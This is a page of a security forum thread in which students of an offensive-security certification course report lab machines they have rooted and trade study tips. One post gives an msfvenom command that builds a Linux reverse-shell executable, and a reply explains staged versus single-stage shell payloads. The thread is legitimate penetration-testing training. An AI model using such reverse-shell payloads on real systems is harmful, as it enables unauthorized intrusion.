+ Reply to Thread
Page 2 of 3 First 12 3 Last
Results 26 to 50 of 72
  1. Senior Member adrenaline19's Avatar
    Join Date
    Dec 2015
    Posts
    248
    #26
    Hey, if you take another look at Phoenix, try different shell packages.

    Sometimes one might not work, but others might work perfectly. Your exploit could be right, but your payload might be the problem.
    Reply With Quote Quote  

  2. SS -->
  3. Member
    Join Date
    Apr 2017
    Posts
    41
    #27
    Quote Originally Posted by adrenaline19 View Post
    Hey, if you take another look at Phoenix, try different shell packages.

    Sometimes one might not work, but others might work perfectly. Your exploit could be right, but your payload might be the problem.
    Got it. Thanks for the tip!
    &Rooted.

    So far:
    ALICE
    BOB
    BETHANY
    MIKE
    BARRY (Low privilege)
    PHOENIX
    Reply With Quote Quote  

  4. Member
    Join Date
    Nov 2016
    Location
    Iowa
    Posts
    67

    Certifications
    OSCP, CISSP, Sec+
    #28
    RE: Nessus (OpenVAS)

    If you have the time, I think it's definitely something you can look into. Personally, even with a good pace and clearing the labs before my 90 days were up, I never really found the time or energy to follow through with vuln scans. It becomes a little annoying when you have to have a root account for each system, which may mean re-rooting to add an account, and run the (small) risk of a revert midway through. It was on my "want to do, but does not apply directly to the exam" list of things to do.

    Still, if you want to have a chance to find multiple issues, that may be a way to go.

    Also, I suggest it if vuln scans are a new thing to you. They are still kind of the bread and butter service for many firms, and can often fuel a subsequent pen test.
    Last edited by LonerVamp; 07-06-2017 at 03:47 PM.
    Reply With Quote Quote  

  5. Member
    Join Date
    Apr 2017
    Posts
    41
    #29
    Quote Originally Posted by LonerVamp View Post
    RE: Nessus (OpenVAS)

    If you have the time, I think it's definitely something you can look into. Personally, even with a good pace and clearing the labs before my 90 days were up, I never really found the time or energy to follow through with vuln scans. It becomes a little annoying when you have to have a root account for each system, which may mean re-rooting to add an account, and run the (small) risk of a revert midway through. It was on my "want to do, but does not apply directly to the exam" list of things to do.

    Still, if you want to have a chance to find multiple issues, that may be a way to go.

    Also, I suggest it if vuln scans are a new thing to you. They are still kind of the bread and butter service for many firms, and can often fuel a subsequent pen test.
    I use SecurityCenter daily at my job, so I'm very familiar with it. I ran the scan and it picked up quiet a bit and I'll dive through it tonight.

    A quick note as well to those starting PWK:
    I've learned that reverse shells (non-meterpreter) generated via msfvenom do not spawn a shell like they should when listening with netcat. I get the connection, but no shell. To get around this, I added /exploit/multi/handler to the command and that makes it so I can listen using metasploit's multihandler for the shell, so my command looks like this:

    msfvenom exploit/multi/handler -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -f elf > exploit.elf

    This then gives me the command shell like I should have. This is also allowed on the OSCP exam as well:

    "
    You may use the following against all of the target machines:
    - multi handler (aka exploit/multi/handler)
    - msfvenom
    - pattern_create.rb
    - pattern_offset.rb"

    Hope this helps anyone.
    Reply With Quote Quote  

  6. Junior Member Registered Member
    Join Date
    Mar 2015
    Posts
    5

    Certifications
    OSCP, CISSP, CISA
    #30
    Quote Originally Posted by Hausec View Post
    A quick note as well to those starting PWK:
    I've learned that reverse shells (non-meterpreter) generated via msfvenom do not spawn a shell like they should when listening with netcat. I get the connection, but no shell.

    This is a common point of confusion that tripped me up as well. You need to use /shell_reverse_tcp rather than /shells/reverse_tcp when generating your shellcode with msfvenom if you want to receive the shell without the metasploit handler. The former is a single stage payload that can be caught by ncat while the second is a staged payload that can only be handled by the metasploit handler.
    Last edited by verdigris; 07-06-2017 at 09:27 PM.
    Reply With Quote Quote  

  7. Senior Member
    Join Date
    Mar 2017
    Location
    Phoenix, AZ
    Posts
    246

    Certifications
    CISSP, C|EH, C|HFI, MCSA 2012, MCSA 2008, Security +, Net+, A+
    #31
    Good info gentlemen. Thank you!
    Reply With Quote Quote  

  8. Member
    Join Date
    Apr 2017
    Posts
    41
    #32
    Quote Originally Posted by verdigris View Post
    This is a common point of confusion that tripped me up as well. You need to use /shell_reverse_tcp rather than /shells/reverse_tcp when generating your shellcode with msfvenom if you want to receive the shell without the metasploit handler. The former is a single stage payload that can be caught by ncat while the second is a staged payload that can only be handled by the metasploit handler.
    Good to know. This is the entire reason why I was so frustrated with Phoenix. As soon as I did the multi-handler it worked like a charm.
    Reply With Quote Quote  

  9. Senior Member adrenaline19's Avatar
    Join Date
    Dec 2015
    Posts
    248
    #33
    Are you using Metasploit at all? If so, which boxes have you popped with Meta?

    Meta really helped me pop a box then I went back and did it again without meta. That helped me solidify some techniques, because it gave me confidence that I had the right path in.
    Reply With Quote Quote  

  10. Senior Member
    Join Date
    May 2017
    Posts
    121
    #34
    hi,

    just curious what distro you guys using for oscp lab/exam?
    are you running on top of windows with VM or usb live ?
    Reply With Quote Quote  

  11. Member
    Join Date
    Nov 2016
    Location
    Iowa
    Posts
    67

    Certifications
    OSCP, CISSP, Sec+
    #35
    OffSec provides a specific PWK student VM for download. I ran mine on a VMWare ESX system.
    Reply With Quote Quote  

  12. Member
    Join Date
    Apr 2017
    Posts
    41
    #36
    Quote Originally Posted by adrenaline19 View Post
    Are you using Metasploit at all? If so, which boxes have you popped with Meta?

    Meta really helped me pop a box then I went back and did it again without meta. That helped me solidify some techniques, because it gave me confidence that I had the right path in.
    Yeah I use meterpreter for most of my payloads. I do follow up though with a non-meterpreter payload just to make sure my method is working. The only ones I solely used MSF for is Alice and Mike.
    Reply With Quote Quote  

  13. Member
    Join Date
    Apr 2017
    Posts
    41
    #37
    Quote Originally Posted by vynx View Post
    hi,

    just curious what distro you guys using for oscp lab/exam?
    are you running on top of windows with VM or usb live ?
    The Kali VM from Offensive Security running on VMWare 12, running on Windows 10.
    Reply With Quote Quote  

  14. Senior Member adrenaline19's Avatar
    Join Date
    Dec 2015
    Posts
    248
    #38
    Alice is a gaping hole and easy practice for importing code from exploit-db to use.

    If you start feeling frisky, go back and re-pop Alice without msf. You'll find that useful later, trust me.
    Reply With Quote Quote  

  15. Member
    Join Date
    Apr 2017
    Posts
    41
    #39
    Stuck on Beta for 3 days now. Cannot get out of this restricted shell. Driving me crazy
    Reply With Quote Quote  

  16. Member
    Join Date
    Apr 2017
    Posts
    41
    #40
    Beta down & rooted. Here's what I learned:

    Some of the "hints" on the forums are garbage and lead me down rabbit holes and questioning my own sanity. I talked to an admin not for hints, but for reassurance on what I was doing was a "correct" way to gain root. Beta was the hardest machine yet I think.
    Reply With Quote Quote  

  17. California Kid JoJoCal19's Avatar
    Join Date
    Mar 2009
    Location
    Jacksonville, FL
    Posts
    2,350

    Certifications
    CISSP, CISM, CISA, CRISC, GCIA, GSEC, CEHv8, CHFIv8, ITIL-F, MSISA, BSBA
    #41
    Quote Originally Posted by Hausec View Post
    Beta down & rooted. Here's what I learned:

    Some of the "hints" on the forums are garbage and lead me down rabbit holes and questioning my own sanity. I talked to an admin not for hints, but for reassurance on what I was doing was a "correct" way to gain root. Beta was the hardest machine yet I think.
    So are people just posting the garbage hints to tr011? That would be disappointing if mods let that stuff go on.
    Have: CISSP, CISM, CISA, CRISC, GCIA, GSEC, CEHv8, CHFIv8, ITIL-F, BSBA - University of Florida, MSISA - WGU
    Currently Working On: MS Cybersecurity, Learning Python
    Next Up:​ None
    Reading:​ Python Crash Course
    Reply With Quote Quote  

  18. Senior Member adrenaline19's Avatar
    Join Date
    Dec 2015
    Posts
    248
    #42
    They don't intentionally post garbage hints to ***** others. They are posting where they are at and what they think is the best way forward. Where they are could be a total rabbit hole, and the mods won't correct them. Getting helpful hints from the forums is like google-fu. It takes a lot of practice and patience.

    The admins in irc will drive you insane too. I swear the OSCP course will either give you hacker zen, or make you a serial killer.
    Reply With Quote Quote  

  19. Member
    Join Date
    Apr 2017
    Posts
    41
    #43
    Quote Originally Posted by JoJoCal19 View Post
    So are people just posting the garbage hints to tr011? That would be disappointing if mods let that stuff go on.
    No, they just give either terrible analogies or hints that can easily be misinterpreted, or they'll just be flat out wrong because they don't know what they're talking about. For example, I got a hint that I needed to "fix an exploit to play with the binaries" when no binaries needed to be played with at all. So this had me down a rabbit hole for a solid 4 hours of trying things that would never work.

    Admins can be really helpful or completely worthless. Sometimes it's nice just to have reassurance that you're doing something right. An example is I had the right idea, but missed a switch when compiling an exploit, so the admin would just say "are you SURE you are compiling correctly?" which told me I'm doing the right thing, just to go over my command again. Other times admins will just be like "this exploit or method isn't working, try something else".
    Reply With Quote Quote  

  20. Member
    Join Date
    Apr 2017
    Posts
    41
    #44
    Progress has been slow and my confidence takes another hit as I've been stuck on DOTTY and GAMMA for quite some time now. I've been on vacation the last week so I really need to buckle down and get focused. I did get Oracle and Susie and a limited shell on GAMMA but I don't think I can do much with that limited shell I have so I'll have to figure out another way. DOTTY has driven me crazy though because I know what I have to do, I just can't get it to work. It seems LFI is my real weakness, as I can get a PoC working easily but when trying to get a shell there's always some hangup.

    ALICE
    BOB
    BOB2
    BETHANY
    MIKE
    BARRY
    PHOENIX
    ALPHA
    BETA
    TOPHAT
    SUSIE
    ORACLE
    GAMMA (Low Privilege)
    Last edited by Hausec; 07-16-2017 at 08:13 PM.
    Reply With Quote Quote  

  21. Member
    Join Date
    Apr 2017
    Posts
    41
    #45
    JD, HOTLINE, and PAYDAY down. I really don't ever think I'll get DOTTY. Just getting too many errors during my exploit and Google turns up nothing. The admins only say "we can't give any more away without spoiling it". Kinda frustrating.


    ALICE
    BOB
    BOB2
    BETHANY
    MIKE
    BARRY
    PHOENIX
    ALPHA
    BETA
    TOPHAT
    SUSIE
    ORACLE
    GAMMA (Low Privilege)
    JD
    HOTLINE
    PAYDAY
    Reply With Quote Quote  

  22. Member
    Join Date
    Sep 2010
    Posts
    71

    Certifications
    M.S. Cyber Security, sec+, Linux +, CCNA RS, CCNA Sec, OSCP
    #46
    Hausec I'm wondering if you could provide an update to if there are newer operating systems in the labs? I got my OSCP a year and half ago, but would be curious to know if they are updating. Do they have any Win 8, 10, server 2012 r2, 2016 in there?
    Reply With Quote Quote  

  23. Member
    Join Date
    Apr 2017
    Posts
    41
    #47
    Quote Originally Posted by BuhRock View Post
    Hausec I'm wondering if you could provide an update to if there are newer operating systems in the labs? I got my OSCP a year and half ago, but would be curious to know if they are updating. Do they have any Win 8, 10, server 2012 r2, 2016 in there?
    Definitely no 10 or 2016 in there. There's a few 8.1 desktops, but I don't think there's any 2012 in there as well. Honestly almost all the Window machines are vulnerable to the fuzzbunch exploit but I confirmed with an admin that you're not allowed to use that on the exam.
    Reply With Quote Quote  

  24. Senior Member adrenaline19's Avatar
    Join Date
    Dec 2015
    Posts
    248
    #48
    You pop any new boxes lately?
    Reply With Quote Quote  

  25. Member
    Join Date
    Apr 2017
    Posts
    41
    #49
    I got LEFTTURN yesterday.

    ALICE
    BOB
    BOB2
    BETHANY
    MIKE
    BARRY
    PHOENIX
    ALPHA
    BETA
    TOPHAT
    SUSIE
    ORACLE
    GAMMA (Low Privilege)
    JD
    HOTLINE
    PAYDAY
    LEFTTURN
    Reply With Quote Quote  

  26. Member
    Join Date
    Jan 2017
    Posts
    96
    #50
    lol comedy!
    Reply With Quote Quote  

+ Reply to Thread
Page 2 of 3 First 12 3 Last

Social Networking & Bookmarks